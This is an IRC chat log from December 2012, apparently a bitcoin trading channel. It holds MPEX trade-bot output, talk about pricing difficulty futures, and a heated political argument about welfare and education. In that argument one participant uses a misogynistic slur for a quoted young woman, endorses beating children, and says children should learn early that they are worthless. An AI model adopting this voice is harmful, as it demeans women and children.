mircea_popescu where you located? Dec 14 06:12:15 romania Dec 14 06:12:23 which seems will never actually join the eurozone at this rate. Dec 14 06:12:38 well that could be a good thing Dec 14 06:12:49 it's been a pretty good thing so far. Dec 14 06:12:58 Germany will get sick of supporting Greece, Spain and soon France Dec 14 06:13:19 and will leave Dec 14 06:13:19 that will be the collapse of that Dec 14 06:13:28 romania has miore gold than like,... australia Dec 14 06:13:47 or kuwait, or brazil/argentina etc. Dec 14 06:13:48 AUD is strengthening tho Dec 14 06:14:01 everyone's strengthening with this idiocy going on Dec 14 06:14:05 [MPEX] [S.MPOE] 4321 @ 0.00061222 = 2.6454 BTC [+] Dec 14 06:14:06 [MPEX] [S.MPOE] 4321 @ 0.00061246 = 2.6464 BTC [+] Dec 14 06:14:08 [MPEX] [S.MPOE] 7458 @ 0.00061252 = 4.5682 BTC [+] Dec 14 06:14:08 not really Dec 14 06:14:10 the us just announced 40+45 bn in crapola Dec 14 06:14:23 EUR, USD, and JPY are printing money like its a fad Dec 14 06:14:40 I deal with left wing nuts all day Dec 14 06:14:58 people wanting free hand outs, expecting something for nothing Dec 14 06:15:05 drives me insane Dec 14 06:15:20 myeah. Dec 14 06:15:28 "o, it's just money". pfff. Dec 14 06:15:37 no, it's not "just" money. it's money. you're just an idiot. Dec 14 06:15:40 they want to tax more to spend more Dec 14 06:15:45 uhmmm you need to reduce the debt Dec 14 06:15:50 instead of leveraging to the hill Dec 14 06:16:12 thanks for getting me all worked up haha Dec 14 06:17:02 hilt Dec 14 06:17:43 hilt* Dec 14 06:17:44 thanks Dec 14 06:18:16 ;;ticker Dec 14 06:18:17 BTCUSD ticker | Best bid: 13.67790, Best ask: 13.78850, Bid-ask spread: 0.11060, Last trade: 13.66412, 24 hour volume: 23631.23995353, 24 hour low: 13.46777, 24 hour high: 13.80000, 24 hour vwap: 13.69064 Dec 14 06:18:26 creeping up huh. Dec 14 06:19:38 "Generally, pushing the security down to the hardware level in conjunction with software provides more protection than a software-only solution. " Dec 14 06:19:55 this is so stupid. wikipedia, land of the useful idiots. who came up with this ? Dec 14 06:20:05 some analyst at BAC said gold to be at 5000$/oz in two years Dec 14 06:20:15 with QE infinity in place, probably Dec 14 06:20:28 the thing is btc will outpace gold on the long term Dec 14 06:20:36 with hyper inflation around the corner Dec 14 06:20:44 mircea_popescu that's abold statement Dec 14 06:20:51 a bold* Dec 14 06:21:10 you can quote me on it Dec 14 06:21:18 depends on what these freaks decide with internet regulating Dec 14 06:21:35 an EMP can take out all of btc.. can't take out gold Dec 14 06:22:17 we have paper wallets Dec 14 06:22:23 all we need is paper blockchain Dec 14 06:22:32 one motherfuckin huge QR code Dec 14 06:23:04 lol. Dec 14 06:23:07 emp can not take out btc Dec 14 06:23:14 in fact, we could hash on slave labour if need be. Dec 14 06:23:32 btc can be implemented to work over carrier pigeons tcp/ip stack reimplementation Dec 14 06:23:44 with shaved headed monks doing the hashing by candlelight. Dec 14 06:23:54 it's really 1100 cluny tech. Dec 14 06:24:50 haha Dec 14 06:24:54 ;;google logopolis Dec 14 06:24:55 Logopolis - Wikipedia, the free encyclopedia: ; Logopolis - TARDIS Index File, the Doctor Who Wiki: ; Logopolis Part 1 - Video Dailymotion: Dec 14 06:25:19 Diablo-D3 ? Dec 14 06:25:43 [MPEX] [S.MPOE] 4321 @ 0.00060768 = 2.6258 BTC [-] Dec 14 06:25:45 [MPEX] [S.MPOE] 292 @ 0.00060754 = 0.1774 BTC [-] Dec 14 06:25:46 [MPEX] [S.MPOE] 10773 @ 0.00060648 = 6.5336 BTC [-] Dec 14 06:25:56 over 60 ?! Dec 14 06:26:49 Figures released Thursday from the Greece’s statistics office showed unemployment at a record high of 24.8 percent in the third quarter of 2012 Dec 14 06:26:57 basically, five people in all of greece still work. Dec 14 06:27:08 heh Dec 14 06:29:56 [MPEX] [S.MPOE] 2800 @ 0.00060668 = 1.6987 BTC [+] Dec 14 06:31:30 90.00000000 BTC for 90 O.BTCUSD.C140T contracts. 90.00000000 BTC for 78 O.BTCUSD.P140T contracts. Dec 14 06:31:32 ??? Dec 14 06:31:33 ... Dec 14 06:31:47 now that forum dick is chaning the emotes on posts in his own thread Dec 14 06:31:52 why the assymtry in the split? Dec 14 06:32:15 well C140 is otm Dec 14 06:32:45 ah Dec 14 06:32:50 itm+1BTC Dec 14 06:32:54 basically you get 90 btc's worth. Dec 14 06:33:05 which for calls is always 90, but for puts varies with how itm they are Dec 14 06:33:27 if you got 100's you'd have 200 puts or w/e Dec 14 06:40:59 idiffs? Dec 14 06:41:33 the diff futures Dec 14 06:41:39 wha? when? Dec 14 06:42:18 lol smickles. blink and you miss mpex news Dec 14 06:42:28 http://trilema.com/2012/further-futures-on-mpex/ Dec 14 06:42:32 http://trilema.com/2012/high-finance-falootin/ Dec 14 06:43:06 ooooh, these look fun. I was dissapointed to see the diff options go just as I had figured out how to profit on them Dec 14 06:43:26 third wednesday? Dec 14 06:43:34 imm dates Dec 14 06:44:37 I was uber busy today too, just got a chance to finally look at these :) Dec 14 06:45:31 :p Dec 14 06:45:41 this is like risk² Dec 14 06:46:10 yes, they're very risky. Dec 14 06:46:34 esp the far out one Dec 14 06:48:33 :D Dec 14 06:48:49 [MPEX] [S.MPOE] 2911 @ 0.00061218 = 1.7821 BTC [+] Dec 14 06:49:18 but hey, with great risk comes great reward. you could in principle make ~70x your money in a year-ish Dec 14 06:49:48 which is like... 4% a week ? Dec 14 06:49:55 ;;calc 1.04**52 Dec 14 06:49:55 7.68658870733 Dec 14 06:50:03 ;;calc 1.038**52 Dec 14 06:50:03 6.95444349219 Dec 14 06:50:08 something like that. Dec 14 06:50:23 [MPEX] [S.BVPS] 280 @ 0.0040975 = 1.1473 BTC [+] Dec 14 06:50:24 [MPEX] [S.BVPS] 20 @ 0.0067 = 0.134 BTC [+] Dec 14 06:51:07 lol aaand highest growth % goes to bvps Dec 14 06:51:41 hmm, the 20 is my fault. And that was my sale order -.- Dec 14 06:52:05 I wanted those 280 shares and wondered if I'd hit into my own sell order. Dec 14 06:52:53 ;;calc 20 * 0.0067 * 0.002 Dec 14 06:52:53 0.000268 Dec 14 06:53:06 ty for the quarter mbtc! Dec 14 06:53:34 alright, i've come up with a fair price for idiff.dec Dec 14 06:54:19 lol Dec 14 06:54:24 ;;gentime 1 Dec 14 06:54:26 The average time to generate a block at 1.0 Mhps, given difficulty of 3370181.79928, is 458 years, 51 weeks, 5 days, 15 hours, 30 minutes, and 9 seconds Dec 14 06:54:32 is it 3370181 ? Dec 14 06:54:32 Consider the fee a donation. (A decadent ~1/3 of a cent. Don't spend it all in one go!) Dec 14 06:54:59 ;;bc,stats Dec 14 06:55:01 Current Blocks: 212143 | Current Difficulty: 3370181.7992778 | Next Difficulty At Block: 213695 | Next Difficulty In: 1552 blocks | Next Difficulty In About: 1 week, 4 days, 12 hours, 20 minutes, and 32 seconds | Next Difficulty Estimate: 3146223.08545920 | Estimated Percent Change: -6.64530067389 Dec 14 06:55:16 ahh, i nearly forgot, tomorrow the rota starts! Dec 14 06:55:23 a new age in bitcoin bitchslapping! Dec 14 06:55:31 really? there's a case to hear? Dec 14 07:00:09 [MPEX] [S.MPOE] 1410 @ 0.00061218 = 0.8632 BTC [+] Dec 14 07:00:11 [MPEX] [S.MPOE] 2690 @ 0.00061252 = 1.6477 BTC [+] Dec 14 07:02:59 ;;calc 200/[bc,diff] Dec 14 07:02:59 5.93439796164e-05 Dec 14 07:03:10 ;;calc 200000000/[bc,diff] Dec 14 07:03:10 59.3439796164 Dec 14 07:13:04 [MPEX] [O.BTCUSD.C120N] 1 @ 0.37686567 BTC [+] Dec 14 07:14:51 smickles not yet Dec 14 07:15:09 wait a second Dec 14 07:15:12 ;;ticker Dec 14 07:15:12 ;;calc 2.9*8954 Dec 14 07:15:12 25966.6 Dec 14 07:15:13 BTCUSD ticker | Best bid: 13.74690, Best ask: 13.74691, Bid-ask spread: 0.00001, Last trade: 13.74690, 24 hour volume: 22405.29779859, 24 hour low: 13.46777, 24 hour high: 13.80000, 24 hour vwap: 13.69301 Dec 14 07:15:28 13.69301 * 0.00061252 Dec 14 07:15:32 ;;calc 13.69301 * 0.00061252 Dec 14 07:15:32 0.0083872424852 Dec 14 07:15:41 [MPEX] [O.BTCUSD.P120N] 1 @ 0.23017945 BTC [+] Dec 14 07:15:46 omg creeping in on 10mn Dec 14 07:16:58 I'd like to short it, but i dunno Dec 14 07:17:18 i'd be like that one guy and netflix or soemthing Dec 14 07:18:24 who ? Dec 14 07:18:43 lol if anyone shorted a week ago they're in pain. Dec 14 07:20:04 [MPEX] [S.DICE] 2000 @ 0.00338548 = 6.771 BTC [+] Dec 14 07:20:10 Whitney Tilson < mircea_popescu Dec 14 07:20:28 https://bitcointalk.org/index.php?topic=130754.0 Dec 14 07:20:42 so im getting hosed with sa traffic Dec 14 07:20:46 who linked mpex ? Dec 14 07:21:42 smickles amusingly, netflix not mentioned on his wiki page :DF Dec 14 07:21:43 also, any miner large enough should be selling an amount of those xdiffs equal to the number 2([easiest shares per minute]*[minutes untill settlement]) Dec 14 07:21:56 whoa what ?! Dec 14 07:21:59 how'd you figure that ? Dec 14 07:22:22 they should sell at a price which is a little above the current diff Dec 14 07:22:50 mircea_popescu: it's simple arbitrage, sell the future, "buy" the shares Dec 14 07:23:02 you reap the extrinsic value Dec 14 07:23:19 http://vr-zone.com/articles/lights-out-boeing-creates-the-first-working-emp-bomb/18163.html we need to bomb boeing Dec 14 07:23:59 smickles but you need some block reward factored in Dec 14 07:24:41 hello Dec 14 07:24:58 25*[shares]/[current diff] then Dec 14 07:25:18 except Dec 14 07:25:22 a share is only worth 25/x Dec 14 07:26:57 ;;calc 25/[bc,diff] Dec 14 07:26:58 7.41799745205e-06 Dec 14 07:27:16 that's the current fair pps right now, correct? Dec 14 07:28:23 [MPEX] [S.MPOE] 1521 @ 0.00060668 = 0.9228 BTC [-] Dec 14 07:28:25 [MPEX] [S.MPOE] 4629 @ 0.00060648 = 2.8074 BTC [-] Dec 14 07:28:50 nah Dec 14 07:28:56 or maybe ? Dec 14 07:29:09 should be Dec 14 07:29:38 ok so then it's [shares]*25 Dec 14 07:29:41 pure and simple ? Dec 14 07:30:40 ;;calc (2.9*(25/[bc,diff]))*8968*2 Dec 14 07:30:40 0.38584268667 Dec 14 07:30:51 ;;bc,diff Dec 14 07:30:52 3370181.7992778 Dec 14 07:31:24 [MPEX] [S.MPOE] 4321 @ 0.00060651 = 2.6207 BTC [+] Dec 14 07:31:25 [MPEX] [S.MPOE] 6198 @ 0.00060648 = 3.759 BTC [-] Dec 14 07:31:27 [MPEX] [S.MPOE] 9881 @ 0.00060111 = 5.9396 BTC [-] Dec 14 07:31:35 so i should sell about a third of a contract at say 03400000 satoshi Dec 14 07:31:39 smickles : you should post this novel sorcery as a comment in the futures post Dec 14 07:32:34 provigil should be given to everyone Dec 14 07:32:42 ;;calc [bc,diff]*1.1 Dec 14 07:32:42 3707199.97921 Dec 14 07:32:51 http://webcache.googleusercontent.com/search?sourceid=chrome&ie=UTF-8&q=cache%3Ahttp://forums.somethingawful.com/showthread.php?threadid=3484374&userid=0&perpage=40&pagenumber=5 Dec 14 07:32:56 someone can send me a dump of this ? Dec 14 07:32:57 na, .037btc :D Dec 14 07:36:51 for the record, iso name for btc would prolly be xbt or something Dec 14 07:36:54 NOT btc. Dec 14 07:37:14 well, when it happens, i may change Dec 14 07:37:43 USD is called about 5 diff things in iso anyway Dec 14 07:39:07 http://www.cmegroup.com/trading/fx/usd-renminbi-futures.html Dec 14 07:40:03 [MPEX] [S.MPOE] 4321 @ 0.00060126 = 2.598 BTC [+] Dec 14 07:40:04 [MPEX] [S.MPOE] 3441 @ 0.00060111 = 2.0684 BTC [-] Dec 14 07:40:42 cme are such idiots. who told them e-micro can be 1/10 standard Dec 14 07:40:45 wtf happened to 1/1000 Dec 14 07:42:48 [MPEX] [S.MPOE] 14455 @ 0.00060111 = 8.689 BTC [-] Dec 14 07:43:09 well it should be interesting Dec 14 07:51:41 http://www.reddit.com/r/Bitcoin/comments/14rk60/private_investigation_on_mtgox/ this is... hm. Dec 14 07:54:03 oh godddd reddit Dec 14 07:54:16 fucking left wing nuts Dec 14 07:54:24 site is pro-socialism Dec 14 07:55:25 lol Dec 14 07:55:40 they're mostly highschooler/college undergrads/grads Dec 14 07:55:48 what'd you expect ? they need tit. Dec 14 07:55:56 yea.. that's fucking the scariest part Dec 14 07:56:02 how does someone who goes to college Dec 14 07:56:09 mircea_popescu: posted. let me know if i've made an ass of myself :D Dec 14 07:56:11 even remotely think socialism is good Dec 14 07:57:37 a friday rally of eur/jpy to 112 would be phenom Dec 14 07:57:58 ;;tslb Dec 14 07:58:00 Time since last block: 1 minute and 6 seconds Dec 14 07:58:30 smickles proposed an example. Dec 14 07:59:00 what docs does mtgox require? Dec 14 07:59:20 that this guy is bitching about Dec 14 08:00:12 if he's so sure that the site is money laundering scam ran my criminals... why did he attempt to use it in the first place Dec 14 08:00:19 bonafide ids i guess Dec 14 08:01:44 [MPEX] [S.MPOE] 5550 @ 0.00060421 = 3.3534 BTC [+] Dec 14 08:01:46 [MPEX] [S.MPOE] 6400 @ 0.00060518 = 3.8732 BTC [+] Dec 14 08:01:47 [MPEX] [S.MPOE] 3650 @ 0.0006123 = 2.2349 BTC [+] Dec 14 08:03:04 [MPEX] [S.DICE] 28175 @ 0.003395 = 95.6541 BTC [+] Dec 14 08:03:06 [MPEX] [S.DICE] 111259 @ 0.0034 = 378.2806 BTC [+] Dec 14 08:04:33 !ticker s.dice Dec 14 08:04:35 [MPEX:S.DICE] 1day: 0.00332218 / 0.00338831 / 0.0034 (176597 shares, 598.37 BTC), 30day: 0.00308319 / 0.00336838 / 0.0034 (2087328 shares, 7,030.92 BTC) Dec 14 08:08:21 http://www.bitcoinmonitor.com/ Dec 14 08:08:30 remarkable what small % of moving funds are mtgox trades Dec 14 08:11:13 I'm not really against socialism... at least not for the health/education part. Probably the only thing I approve spending for is education/health. I would not mind helping others for that. Money handouts however... Dec 14 08:11:48 [MPEX] [S.MPOE] 671 @ 0.0006123 = 0.4109 BTC [+] Dec 14 08:11:49 [MPEX] [S.MPOE] 16299 @ 0.00061252 = 9.9835 BTC [+] Dec 14 08:11:51 [MPEX] [S.MPOE] 2580 @ 0.00061382 = 1.5837 BTC [+] Dec 14 08:12:51 Namjies the problem with education paid for by other people is that it creates the disrespectful assholes we see today. Dec 14 08:13:02 Namjies: is socialism divisible/severable like that? Dec 14 08:13:02 I agree education needs to spending Dec 14 08:13:09 but the teacher unions are ridic Dec 14 08:13:15 i would rather have millions of smart kids die iliterate than billions of idiot kids think it's ok to give their opinions when adults talk. Dec 14 08:13:20 exactly! smickles! Dec 14 08:13:39 How does free education creates those disrespectful assholes? Dec 14 08:13:55 because they don't risk anything. goes to school, doesn't learn, no big deal Dec 14 08:14:09 appropriations are never given where they're given Dec 14 08:14:14 if going to school was an exception, and his only chance out of the slum and something he'd work hard for, it'd be different. Dec 14 08:14:25 you create one social net and then before you know it.. it's like the aids virus Dec 14 08:14:26 You mean college/university free education or primary/high school education? Dec 14 08:14:30 everything has a social safety net Dec 14 08:14:32 i mean primary school. Dec 14 08:14:56 kid must know that if he's kicked out of school that means prison, digging ditches or sucking cock Dec 14 08:14:59 and must know this aged 6. Dec 14 08:15:23 and in general, kids must know they're worthless at a much earlier age than the current system Dec 14 08:15:37 where they imagine they're the king of the world for the first 2-3 decades and then discover they really have no value. Dec 14 08:15:48 hahaha Dec 14 08:15:53 you're awesome Dec 14 08:15:56 love it! Dec 14 08:15:57 the shock is psychologically scarring Dec 14 08:16:04 they need to start with it earlier so it's softer. Dec 14 08:16:26 I'm so sick and tired of this self esteem crap Dec 14 08:16:27 Hmm... that sounds somewhat cliche. I don't see many people acting that way. I might be blind tho. Dec 14 08:16:34 giving awards to make kids feel included Dec 14 08:16:43 Namjies well, we're discussing principle. impossible to attack with anecdote. Dec 14 08:16:45 But I do agree education is quite soft on kids. Dec 14 08:16:58 problem with it being soft on kids is tghat there's nothing they can accomplish anymore. Dec 14 08:16:59 me, living in the US... I see people using depression as a scapegoat Dec 14 08:17:12 fucking... other countries its called hard on your luck.. get over it Dec 14 08:18:06 hey, did greece recently issue a fuckload of bonds, then buy them all back at 30% par? Dec 14 08:18:19 then issue another fuckload? Dec 14 08:18:23 something like that Dec 14 08:18:24 anyway. that aside health i can see as a function of govt, in many cases. mostly trauma. Dec 14 08:18:30 think Germany gave them the money Dec 14 08:18:38 smickles yes. Dec 14 08:18:47 mircea_popescu: genius Dec 14 08:18:58 Regardless, I'd feel better off if even the worst individuals would still get that education. They're already bad enough with it. Dec 14 08:19:03 i was ranting about how the eurozone is not good enough for romania to join earlier. Dec 14 08:19:14 in that spirit, who want's to lend me 10000 btc? Dec 14 08:19:15 Namjies no. this devalues education for everyone else. Dec 14 08:19:24 Namjies: the problem is... some people just dont want to learn Dec 14 08:19:24 if anyone can eat pie this devalues my pie. Dec 14 08:20:01 So what? If they can't afford it, don't educate them? Dec 14 08:20:05 exactly. Dec 14 08:20:43 I think that means homeschooling Dec 14 08:20:46 I can hardly see how I can expect a 5 year old kid to pay his first year of primary school. The whole costs... Dec 14 08:20:51 not the govt job. if rich people want to pay for their education let them Dec 14 08:20:53 but don't tax for it. Dec 14 08:21:04 [MPEX] [S.MPOE] 12250 @ 0.00061345 = 7.5148 BTC [-] Dec 14 08:21:21 if his parents suck he's screwed. Dec 14 08:21:26 social promotions within schools shouldnt exist either Dec 14 08:21:38 this gives parents an incentive to not suck. Dec 14 08:21:53 mircea_popescu: exactly... survival of the fittest Dec 14 08:22:07 instead of weeding out the idiots, now we encourage them to strive Dec 14 08:22:18 Right... so instead of helping the kid into society, exclude it because his parent sucks and don't care. Dec 14 08:22:22 yes. Dec 14 08:22:27 and we get a bunch of half ass dedicated people working, wanting handouts Dec 14 08:22:30 society should be exclusive not inclusive. Dec 14 08:22:36 if it's inclusive i don't want to be part of it Dec 14 08:22:44 you end up stuck with the idiots and then fail. Dec 14 08:22:49 you want to include the peaks not the bottoms. Dec 14 08:22:49 society should be exclusive not inclusive. Dec 14 08:22:52 perfect Dec 14 08:22:57 couldn't have said it better myself Dec 14 08:23:20 I don't see why we should exclude good individuals on behalf their parents are retarded/bad. Dec 14 08:23:24 "good" Dec 14 08:23:31 they're not good if they parents suck. Dec 14 08:24:01 Stupid people don't all breed retards and rich people don't all breed bright individuals. Dec 14 08:24:07 has nopthing to do with good. Dec 14 08:24:19 intelligence is just part of the pie. Dec 14 08:24:39 Same goes for just about anything else. Dec 14 08:24:46 no. Dec 14 08:24:56 good is not unrelated, randomly occuring, fallen from the sky Dec 14 08:25:01 good is worked and sweated towards. Dec 14 08:25:11 no sweat, no good. Dec 14 08:25:47 Yes, but the 6 year old has no means to pay the costs of his education, even if he was a potent individual and was willing to. Dec 14 08:25:59 convince me he is and i might pay it. Dec 14 08:26:12 but don't assume he is for me and expect i give you the money. Dec 14 08:28:05 a fine example : i made a contest on my blog, for peopel to write fiction. reward was 5btc minimum + up to 100 Dec 14 08:28:11 mircea_popescu: I have an idea Dec 14 08:28:23 Hmm, such a thing would be impossible. We couldn't have a standard procedure to determine the desrving ones if each member of the society wanted that they personally approve of said person. Dec 14 08:28:23 of the thousands of people who saw it and hundred+ that talked to me about it, i got 3 submissions. Dec 14 08:28:26 Namjies can self impose an 80% tax on himself Dec 14 08:28:31 so that he can support the kiddies Dec 14 08:28:33 why ? cause people were busy dickingaround on facebook ? fuck that. Dec 14 08:28:47 and the procedure SHOULD NOT be standard. Dec 14 08:28:54 why standard? whoever has the money makes the rules. Dec 14 08:29:03 [MPEX] [S.MPOE] 4321 @ 0.0006071 = 2.6233 BTC [-] Dec 14 08:29:04 [MPEX] [S.MPOE] 4650 @ 0.0006074 = 2.8244 BTC [+] Dec 14 08:29:06 [MPEX] [S.MPOE] 8279 @ 0.00061382 = 5.0818 BTC [+] Dec 14 08:29:07 that is the very point of money : they who have it are smarter than you, and you should listen to them. Dec 14 08:29:28 jessica simpson has money Dec 14 08:29:30 the problem is now... even the people who aren't smart have money Dec 14 08:29:33 That seems innacurate. Dec 14 08:29:49 pigeons bonafide only because of the current state sponsored moral hazard Dec 14 08:29:50 Namjies: http://blog.smickles.com/wp-content/uploads/2012/11/Shoes_header.jpg Dec 14 08:29:56 I know Dec 14 08:30:04 sure, let's tax 50% of society and give it out to the worst least worthy recipients Dec 14 08:30:05 but it's a vicous cycle Dec 14 08:30:09 then wonder why "stars" have money Dec 14 08:30:15 well, cause you pump money into a cesspool. Dec 14 08:30:18 money you stole. Dec 14 08:31:15 if taxes were a reasonable 0.08% i guarantee you jessica simpson would be back to waitressing. Dec 14 08:31:28 Idiots get their hands on vast amount of money. Most often from more intelligent parents. Those idiots also tend to damage their heritage badly. Dec 14 08:31:30 or w/e she does "profesionally" Dec 14 08:31:43 just look at the NFL, NBA Dec 14 08:31:51 they get multi-million dollar contracts Dec 14 08:31:54 Namjies that problem is purely theoretical these days. Dec 14 08:32:03 and are just as broke as they were before when their careers end Dec 14 08:32:09 bonafide yes, because the foodstamp fed multitudes have discretionary spending. Dec 14 08:33:37 and i guess now i'm the go to rightest-wing guy in btc huh. Dec 14 08:33:41 Ah, but those idiots who make stars rich still have money. That means they either work or get handouts. If we abolish handouts, then that would happen regardless. Dec 14 08:33:49 nope Dec 14 08:33:51 I agree Dec 14 08:34:02 Namjies if the money they spent came from their work it'd at least be defensible. Dec 14 08:34:15 as in, music doesn't suck today, it's just i have divergent tastes to the world. Dec 14 08:34:21 [MPEX] [S.MPOE] 3750 @ 0.00061366 = 2.3012 BTC [-] Dec 14 08:35:26 [MPEX] [S.DICE] 1637 @ 0.00338548 = 5.542 BTC [-] Dec 14 08:35:27 [MPEX] [S.DICE] 1350 @ 0.00336315 = 4.5403 BTC [-] Dec 14 08:35:29 [MPEX] [S.DICE] 313 @ 0.00336178 = 1.0522 BTC [-] Dec 14 08:36:46 What about public infrastructure? Acceptable to fall on government's desk? Dec 14 08:37:33 Namjies im pretty sure if given the same revenue (80% gas accise + car tax + etc) the public sector would be doing a much better job with roads Dec 14 08:38:03 but this point is amply debatable because in fact large projects require large agents and at that size the diff between govt and corporation is mostly academic Dec 14 08:38:16 the principles informing decisions are more important than the exact incorporation form. Dec 14 08:38:26 but look here : Sarah Ford, age 20, NY Dec 14 08:38:26 “I'm a young and involved activist about to start my double major in environmental studies and politics, and I'm very, very angry about what is going on in this country. I blame this country's problems on the exploitations of corporations and a blind worship of the "free market" and "self-regulating capitalism" (Tell me, how does that work again? Oh yeah, it doesn’t morons). Following the deregulation of the banki Dec 14 08:38:26 ng sector and the repeal of Glass-Steagall (the financial regulation act that would have prevented the financial crisis), this country has gone down the drain. Dec 14 08:38:36 this stupidcunt thinks she may have political opinions ? aged 20 ? Dec 14 08:38:38 jesus god. Dec 14 08:39:34 kids that aren't beaten enough develop this very superficial "we know shit" conviction, and then the result is btctalk lending & usagi financial expertise. Dec 14 08:40:06 mircea_popescu for president Dec 14 08:40:14 nah. Dec 14 08:40:24 [MPEX] [S.MPOE] 571 @ 0.00061366 = 0.3504 BTC [-] Dec 14 08:40:25 [MPEX] [S.MPOE] 13041 @ 0.00061382 = 8.0048 BTC [+] Dec 14 08:40:26 [MPEX] [S.MPOE] 8488 @ 0.00061443 = 5.2153 BTC [+] Dec 14 08:40:31 just buy my stock lol Dec 14 08:40:38 Hmm. Again a bit cliche example. Dec 14 08:40:56 which one ? Dec 14 08:41:07 The quoted one. Dec 14 08:41:17 if it weren't so prevalent... Dec 14 08:41:49 we've taken things too far. much too far. sure, confidence is a good thing, kids were opressed 50 years ago etc. but by now it's way overdone. Dec 14 08:42:28 way, way overdone. college mostly consists of elderly people asking kids what they think. who the fuck cares what 20yos think ? they're dumb as rocks by the very definition. Dec 14 08:43:44 I've seen high-school/college level teachers having such teachings. Dec 14 08:44:21 i mean, it works once a semester or something. but it can not be the whole curricula. Dec 14 08:44:44 I'm all for government having certain responsibilities. Others don't or want different responsibilities. Dec 14 08:45:04 name one responsibility govt has ? Dec 14 08:45:27 and then name one govt person who got into any sort of trouble for fucking up. Dec 14 08:45:43 It depends on the government... not all governments have the same responsibilities. Dec 14 08:46:44 ya well... Dec 14 08:46:51 I was about to say, don't it all boil down to what priorities each individual has and what they are consequently willing or not willing to pay/be taxed for? Dec 14 08:46:56 in all times and places government is this "we'll do our best, expect nothing in return" proposition. Dec 14 08:47:22 this works great if we're a village of 100 people and most of them love the one guy in charge Dec 14 08:47:25 otherwise... Dec 14 08:48:19 Well on that point, everything is easier to manage when it's small. For large country, where those in charge can have a hard time even seeing the consequence of their actions... it messes things up. Dec 14 08:48:46 It's also more complex. It conveniently allows to shift blame on a million other thing. Dec 14 08:49:05 right-o. Dec 14 08:49:22 but you know, just because something is impossible to do (large state) doesn't mean you should try anyway Dec 14 08:49:25 it means you SHOULDNT TRY Dec 14 08:50:50 It might not be impossible... but so far large governments are very inneficient as far as I care. Dec 14 08:50:59 indeed. Dec 14 08:51:20 well, here's it from my pov : we dicked around for 100 years trying to make this welfare state work. it failed, pack it up. Dec 14 08:51:43 i don't mind the experience, really, but it's unconscionable to pretend like it didn't happen. Dec 14 08:51:44 [MPEX] [S.MPOE] 5244 @ 0.00061443 = 3.2221 BTC [+] Dec 14 08:51:45 [MPEX] [S.MPOE] 5350 @ 0.00061472 = 3.2888 BTC [+] Dec 14 08:51:46 [MPEX] [S.MPOE] 17306 @ 0.00061539 = 10.6499 BTC [+] Dec 14 08:54:00 mircea_popescu Will the reserve requirements for X.IDIFF.MAR be reduced to 0.09777BTC/contract and released to the buyer following the close of this December's future? Dec 14 08:54:58 currently it is 0.283/BTC Dec 14 08:55:22 the reserve requirements will be reduced for new contracts, but old contracts will be unchanged Dec 14 08:55:53 And on my point of view, I would like to offer every kid a chance at education regardless of the parent's means as well as health care. That would be purely based from personal priorities. Dec 14 08:56:02 how will buyers know if they are getting a contract with a higher limit or not? Dec 14 08:56:06 I however hardly approve cash handouts and I'm saddened by the inneficiency of government at providing. Dec 14 08:56:11 Namjies i would agree, but every deserving kid. it's important. Dec 14 08:56:32 Bugpowder they don't. in case of margins overrun the contracts are awarded proportionally. Dec 14 08:56:49 say there's 90 contracts at margin high, and 10 at margin low Dec 14 08:56:54 say the low margin gets blown Dec 14 08:57:03 everyone gets 10% of contracts liquidated. Dec 14 08:57:47 Yes. I'd approve with the deserving kid part. But there is an issue with that. If we exclude a kid for not making any effort/causing trouble, what do you do? Dec 14 08:58:03 nothing. Dec 14 08:58:12 so the loss cap for any futures creator is based on the percentage of new vs. legacy contacts Dec 14 08:58:21 contracts Dec 14 08:59:35 um Dec 14 08:59:54 i think we're talking at crosspurposes. yiou mean for future asset buyer or creator.seller ? Dec 14 09:01:17 Well parents can't decide for their children how to act and neither can a kid do for his parent. Left out to the means of parents, kids who would be productive with proper education are left out. If we provide but exclude undeserving kids, but the parent are productive, they're left with a kid to provide for, which would also keep them away from work. Dec 14 09:01:43 Well parents can't decide for their children how to << whart ?! why not ? Dec 14 09:01:47 [MPEX] [S.MPOE] 5911 @ 0.00061539 = 3.6376 BTC [+] Dec 14 09:01:48 [MPEX] [S.MPOE] 10739 @ 0.0006158 = 6.6131 BTC [+] Dec 14 09:01:52 asset creator has a max loss of the difference between the mean collatoral level and the price he sold it for Dec 14 09:01:55 right? Dec 14 09:02:00 They can't decide how they act. Dec 14 09:02:19 Bugpowder yes, practically. as far as mpex is concerned at most he gets no collateral back, at best he gets all collateral back. Dec 14 09:02:37 Namjies how they actually act or how they should act ? Dec 14 09:03:15 How they act. They can't control his brain as far as I'm aware. Dec 14 09:03:39 If the children is unwilling to behave regardless of what the parents do. Dec 14 09:04:05 all children are born cowards. Dec 14 09:04:18 an inability to make a kid act exactly the way you want is in general clear proof you're an idiot. Dec 14 09:04:31 There's always exception. Dec 14 09:04:37 sure, but rather rare. Dec 14 09:04:52 Although we could consider that by having a child, you accept this possibility and choose to provide or do something with your child. Dec 14 09:04:58 So a price of over 0.097 for the MAR contract is not a guaranteed loss for an asset buyer on the open market, since collateral reqs are at 0.28 right now. Will the buyer be able to know how many contracts are at the low and high level? I imagine that would factor in risk/reward and purchase price calculations Dec 14 09:05:07 Namjies no, we couldn't. having a kid is NOT a contract with the state. Dec 14 09:05:14 [MPEX] [S.MPOE] 9511 @ 0.0006158 = 5.8569 BTC [+] Dec 14 09:05:16 [MPEX] [S.MPOE] 7589 @ 0.000616 = 4.6748 BTC [+] Dec 14 09:05:26 Bugpowder not other than by watching the market. Dec 14 09:05:52 that aside, i agree the system is imperfect for these reasons, but i see no alternatives. Dec 14 09:06:30 just trying to figure it out.... some aspects are opaque Dec 14 09:06:45 A contract with the state? What are you talking about? Dec 14 09:06:55 i mean i guess alternatively i could just shave the collateral each quarter, and return it. Dec 14 09:07:00 that'd make it more fair ? maybe ? Dec 14 09:07:17 Namjies as in, having a kid can not be considered a promise to anything nor an agreement to anything. Dec 14 09:07:17 Risk discovery would be easier Dec 14 09:07:32 for example, I was going to sell for .0888 Dec 14 09:07:34 having a kid is a sovereign right above and beyond any convention, much like breathing. Dec 14 09:08:02 Bugpowder risk discovery would b easyer, but the risk of sudden collapse would be notable. Dec 14 09:08:05 but with this collateral scheme, I'm going to sell for over .097 to protect myself. Dec 14 09:08:23 as in, quarter closes, all positions get wiped. Dec 14 09:08:27 but the buyer may not realize when the contract was struck Dec 14 09:09:06 Bugpowder im really very much interested in discussing this in depth, i think it's very important. Dec 14 09:09:32 what about quarter closes, all margin reqs are reset to the new difficulty with the new multiplyer Dec 14 09:09:41 the risk of collapse. Dec 14 09:09:46 anything that drops under that levels gets liquidated Dec 14 09:09:51 suppose diff is above 